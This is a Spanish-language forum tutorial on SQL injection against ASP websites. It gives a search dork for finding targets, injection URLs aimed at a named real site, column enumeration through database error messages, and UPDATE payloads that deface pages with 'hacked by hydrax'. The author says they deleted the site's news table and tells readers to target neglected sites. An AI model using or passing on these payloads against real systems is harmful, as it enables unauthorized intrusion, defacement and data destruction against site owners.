Buenas noches gente, Primero que NADA quiero aclarar 2 Cositas antes que salgan personas a llamarme SPAM o Copy And Paste o cm Sea :)
Aclaro la guia La hice YO :) y Aprendi este metodo Gracias al tutorial de Xassiz ! Pero la Razon de Haberlo Publicado es que Ya en Pocos Foros Ya no Existe El Metodo ASP ! Bueno al Grano :)
*Como Buscar Webs ASP
Buscamos asi en Google , noticias.asp?idnot= Con eso Podemos Buscar webs ASP !
*Buscando vulnerabilidad
Yo encontre esta web :)
http://www.keasor.com/noticias.asp?idnot=2
Para ver si era Vulnerable Solo Borre el 2 y reemplaze Por ' having 1=1--
Quedaria Asi
http://www.keasor.com/noticias.asp?idnot=' having 1=1--
o tambien Pueden Usarla Asi
http://www.keasor.com/noticias.asp?idnot=2 having 1=1-- ( Para Esta Web Keasr.com ) Usare este metodo sin Borrar el 2 Ya que al reemplazar el 2 Por ( ') Me da Error :) Algunas web Te dan errro y Otras No
Si la web es vulnerable A Esta Sql Inyeccion Nos Dara un Error Como este, Puede Ser Igual O Parecido
Microsoft OLE DB Provider for ODBC Drivers error `80040e14`
[Microsoft][ODBC SQL Server Driver][SQL Server]La columna `Noticias.Id` de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.
C:\INETPUB\WWWROOT\SIT\../html/noticias.ASP, line 118
* Como alli pueden Observar al Escribir Having 1=1-- Nos dio "Noticias.ID"
Ahora Sabemos el Nombre de la Tabla " Noticias.id "
¿ Como Puedo ver las colummnas que estan dentro de Noticias.ID ?
Bueno Usaremos Group by
http://www.keasor.com/noticias.asp?idnot=2 group by noticias.ID having 1=1--
Alli nos Arrojara una Colummna llamada NOTICIAS.Idguia
¿Como Hago Para Buscar Otra Colummna Si esta No me Interesa?
Bueno lo unico que tienes que hacer es poner una ,(COMA) y poner la columma que nos arrojo anteriormente Ejemplo :
http://www.keasor.com/noticias.asp?idnot=2 group by noticias.ID,noticias.idguia having 1=1--
y Asi siguen Hasta que Encuentren una Columma Interesante a Su conveniencia :)
Bueno esta web no me arrojo muchas Colummnas que me Interesaran Como Titulo, Contenido ETC , me canse de Buscar y no encontre nada Hasta que Me Moleste y Borre la Tabla de Noticias y sus Colummnas
Bueno Ahora aqui viene lo Bueno y lo que Nos Interesa
¿Aja Tengo las Colummnas y que Hago con Ellas, como hago la Inyeccion ?
Bueno Si tu cuando Pusistes having 1=1-- ( En la web que TU Buscastes Ya que en la que esta en este tutorial No haras nada cn esa web )Te aparecio Directamente la colummna noticias.TITULO
Procedemos a Modificar Todo a Nuestra Conveniencia
Cambiaremos el Group By Por Update "Tabla " Set " Colummna Ejemplo
http://www.keasor.com/noticias.asp?idnot=2 Update noticias set titulo= 'hacked by hydrax'
Actualizan la Web y veran de Titulo Hacked By hydrax :)
¿Quiero Modificar Otra cosa que no sea El Titulo ?
Facilmente
http://www.keasor.com/noticias.asp?idnot=2 Update noticias set " AQUI PONES LA COLUMMNA QUE QUIERAS MODIFICAR "= 'hacked by hydrax'
Consejos : Busquen paginas web que Esten descuidadas y nadie la Use :) La idea es Aprender para que en un Furuto NO Tengas Problemas :)
Si te sirvio dame las Gracias :)
By HyDraX Muchas Gracias y Suerte
![[Imagen: ubuntuuser5.jpg?w=350&h=19]](http://lacasadetux.files.wordpress.com/2008/05/ubuntuuser5.jpg?w=350&h=19)